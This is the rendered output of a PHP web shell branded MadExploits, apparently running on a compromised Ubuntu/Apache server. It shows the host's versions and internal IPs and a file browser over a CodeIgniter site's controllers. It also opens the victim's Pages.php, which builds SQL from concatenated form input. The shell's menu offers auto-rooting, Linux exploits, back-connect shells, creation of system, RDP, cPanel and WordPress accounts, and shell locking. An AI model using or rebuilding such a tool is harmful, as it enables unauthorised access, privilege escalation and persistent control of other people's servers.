Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
application /
controllers /
[ HOME SHELL ]
Name
Size
Permission
Action
11-05-Publication.php
1.2
KB
-rwxr-x--x
260923-Events.php
1.62
KB
-rwxr-x--x
Ablog.php
17.92
KB
-rwxr-x--x
Artist.php
372
B
-rwxr-x--x
Blog.php
1.71
KB
-rwxr-x--x
Cat.php
19.11
KB
-rwxr-x--x
Contact.php
4.03
KB
-rwxr-x--x
Corse.php
20.35
KB
-rwxr-x--x
Courses.php
1.76
KB
-rwxr-x--x
Dashboard.php
491
B
-rwxr-x--x
Digital.php
373
B
-rwxr-x--x
Event.php
371
B
-rwxr-x--x
Events.php
1.62
KB
-rwxrwxrwx
Evnt.php
21.69
KB
-rwxr-x--x
Faculty.php
602
B
-rwxr-x--x
Fareas.php
1.16
KB
-rwxr-x--x
Home.php
717
B
-rwxr-x--x
Item.php
32.49
KB
-rwxr-x--x
Jobc.php
20.29
KB
-rwxr-x--x
Jobs.php
4.62
KB
-rwxr-x--x
Login.php
3.63
KB
-rwxr-x--x
Mdc.php
15.88
KB
-rwxr-x--x
Media.php
1.14
KB
-rwxr-x--x
Memories.php
481
B
-rwxr-x--x
Mems.php
16.03
KB
-rwxr-x--x
Pages.php
6.05
KB
-rwxr-x--x
Prod.php
5.01
KB
-rwxr-x--x
Profile.php
2.15
KB
-rwxr-x--x
Proj.php
22.41
KB
-rwxr-x--x
Projects.php
1.64
KB
-rwxr-x--x
Projt.php
10.86
KB
-rwxr-x--x
Puba.php
10.95
KB
-rwxr-x--x
Publ.php
22.94
KB
-rwxr-x--x
Publication.php
2.59
KB
-rwxr-x--x
Pubv.php
10.95
KB
-rwxr-x--x
Staff.php
600
B
-rwxr-x--x
Udig.php
10.37
KB
-rwxr-x--x
User.php
25.22
KB
-rwxr-x--x
Workshops.php
1.76
KB
-rwxr-x--x
Wrks.php
20.3
KB
-rwxr-x--x
index.html
131
B
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Pages.php
<?php defined('BASEPATH') OR exit('No direct script access allowed'); class Pages extends CI_Controller { public function __construct() { parent::__construct(); $this->gblm->is_System(); $this->data = $this->gblm->GblConfig(); $this->data['PAGE_TITLE'] = $this->lang->line('MNU_ITM'); $this->load->model('Pages_model','stm'); $this->load->library('form_validation'); $this->load->library('Ajax_pagination'); $this->data['B_WDTH'] = HW450; $this->data['B_HGHT'] = HW304; $this->perPage = RCRD_PER_PAGE; $this->perPage = 50; } public function Index() { $data = $this->data; $data['PRSNT_BLK'] = BLK_LIST; $data['SUB_HEAD'] = $this->lang->line('GL_LIST'); $Cond="STATUS='".STATUS_A."'"; $Con3 = 'ID'; $Con4 = 'ASC'; $data['SORT_NAME'] = $Con3; $data['SORT_TYPE'] = $Con4; $data['NEW_TD_ID'] = $Con3.'-'.$Con4; $data['pgeList'] = $this->stm->pgeList(); $data['rdList'] = $this->stm->cmsList($Cond,$Con3,$Con4); $data['cList'] = $this->load->view($this->data['DIR']['LIST'],$data,TRUE); $this->load->view($this->data['DIR']['VIEW'],$data); } public function rdSrch() { $data = $this->data; $this->session->unset_userdata('sString'); $this->session->unset_userdata('sortName'); $this->session->unset_userdata('sortBy'); $pgNme = Rsp($this->input->post('pgNme')); $SrchKey = Rsp($this->input->post('SrchKey')); $Con3 = Rsp($this->input->post('sortName')); $Con4 = Rsp($this->input->post('sortBy')); $Cond="STATUS='".STATUS_A."'"; if($pgNme!='') $Cond .= " AND ALIAS LIKE '%".CaseS(dbIn($pgNme))."%'"; if($SrchKey!='') $Cond .= " AND PTITLE LIKE '%".CaseS(dbIn($SrchKey))."%'"; $this->session->set_userdata('sString', $Cond); $this->session->set_userdata('sortName', $Con3); $this->session->set_userdata('sortBy', $Con4); $data['SORT_NAME'] = $Con3; $data['SORT_TYPE'] = $Con4; $data['NEW_TD_ID'] = $Con3.'-'.$Con4; if($this->fm->cntCon($this->data['TBL']['CMS'],$Cond)> 0) { $data['PRSNT_BLK'] = BLK_LIST; $data['rdList'] = $this->stm->cmsList($Cond,$Con3,$Con4); $this->load->view($this->data['DIR']['LIST'],$data); } else { echo NO_RECORD; } } public function Update($str=null) { $data = $this->data; if($str=='') { $this->session->set_flashdata(STATUS_MSG,$this->lang->line('GL_WRONG_MSG')); $this->session->set_flashdata(STATUS_TYPE,'error'); redirect($this->data['URL']['RDR_URL'], $data); } $str_1=explode('-',$str); $Id=substr($str_1[0],0,-3); if($Id=='' || (int)$Id<=0 || ($this->fm->cntCon($this->data['TBL']['CMS'],"ID='".$Id."' AND STATUS='".STATUS_A."'" ) <=0)) { $this->session->set_flashdata(STATUS_MSG,$this->lang->line('GL_WRONG_MSG')); $this->session->set_flashdata(STATUS_TYPE,'error'); redirect($this->data['URL']['RDR_URL'], $data); } $data['PRSNT_BLK'] = BLK_UPDATE; $data['SUB_HEAD'] = $this->lang->line('GL_UDT'); $data['Id'] = $Id; $data['Dtls'] = $this->stm->pgDtls("".$this->data['URL']['DB_ID']."='".$Id."'"); $this->load->view($this->data['DIR']['VIEW'],$data); } public function recordUpdate() { $data = $this->data; $dv_ID=$this->input->post('Id'); $this->form_validation->set_rules('FldName',$this->lang->line('SM_FDREQ'),'trim|required'); $this->form_validation->set_rules('pdesc',$this->lang->line('SM_FDREQ'),'trim|required'); $this->form_validation->set_rules('SeoTl',$this->lang->line('SM_FDREQ'),'trim|required'); $this->form_validation->set_rules('Seokey',$this->lang->line('SM_FDREQ'),'trim|required'); if ($this->form_validation->run() == FALSE) { $data = $this->data; $data['PRSNT_BLK'] = BLK_UPDATE; $data['SUB_HEAD'] = $this->lang->line('GL_UDT'); $data['Id'] = $dv_ID; $data['Dtls'] = $this->stm->pgDtls("".$this->data['URL']['DB_ID']."='".$dv_ID."'"); $this->load->view($this->data['DIR']['VIEW'],$data); } else { $UpPath = $this->data['DIR']['DIR_CMS'].'/'; if($_FILES['prPic']['name']!='') { $config['allowed_types'] = IMG_TYPE; $config['upload_path'] =$this->data['DIR']['DIR_CMS'].'/'; $config['file_name'] = $dv_ID.rand(000,999); $this->load->library('upload', $config); $this->upload->initialize($config); if(!$this->upload->do_upload('prPic')) { $this->session->set_flashdata(STATUS_MSG,$this->upload->display_errors()); $this->session->set_flashdata(STATUS_TYPE,$this->lang->line('GL_ERR_MSG')); $this->session->set_flashdata(STATUS_ICON,EROR_ICON); redirect($this->data['URL']['RDR_URL'], $data); } else { $upload_data = $this->upload->data(); $prPic = $upload_data['file_name']; } } else $prPic =$this->input->post('oldPic'); $data = array( 'BANER' =>$prPic, 'PTITLE' =>Rsp(dbIn($this->input->post('FldName'))), 'PHCLR' =>Rsp(dbIn($this->input->post('phclr'))), 'PDESC' =>Rsp(dbIn($this->input->post('pdesc'))), 'PHDCLR' =>Rsp(dbIn($this->input->post('phsclr'))), 'UDESC' =>Rsp(htmlentities($this->input->post('udesc'))), 'MDESC' =>Rsp(htmlentities($this->input->post('mdesc'))), 'LDESC' =>Rsp(dbIn($this->input->post('ldesc'))), 'SEOT' =>Rsp(dbIn($this->input->post('SeoTl'))), 'SEOK' =>Rsp($this->input->post('Seokey')), 'SEOD' =>Rsp($this->input->post('SeoDesc'))); $dbStatus=$this->fm->upCon($this->data['TBL']['CMS'], $data,"".$this->data['URL']['DB_ID']."='".$dv_ID."'"); if($dbStatus == TRUE) { $this->session->set_flashdata(STATUS_MSG,$this->lang->line('GL_ADD_SUC_MSG')); $this->session->set_flashdata(STATUS_TYPE,'success'); $this->session->set_flashdata(STATUS_ICON,'success'); redirect($this->data['URL']['RDR_URL'], $data); }if($dbStatus == FALSE) { $this->session->set_flashdata(STATUS_MSG,$this->lang->line('GL_WRONG_MSG')); $this->session->set_flashdata(STATUS_TYPE,$this->lang->line('GL_ERR_MSG')); $this->session->set_flashdata(STATUS_ICON,'error'); redirect($this->data['URL']['RDR_URL'], $data); } } } }
Close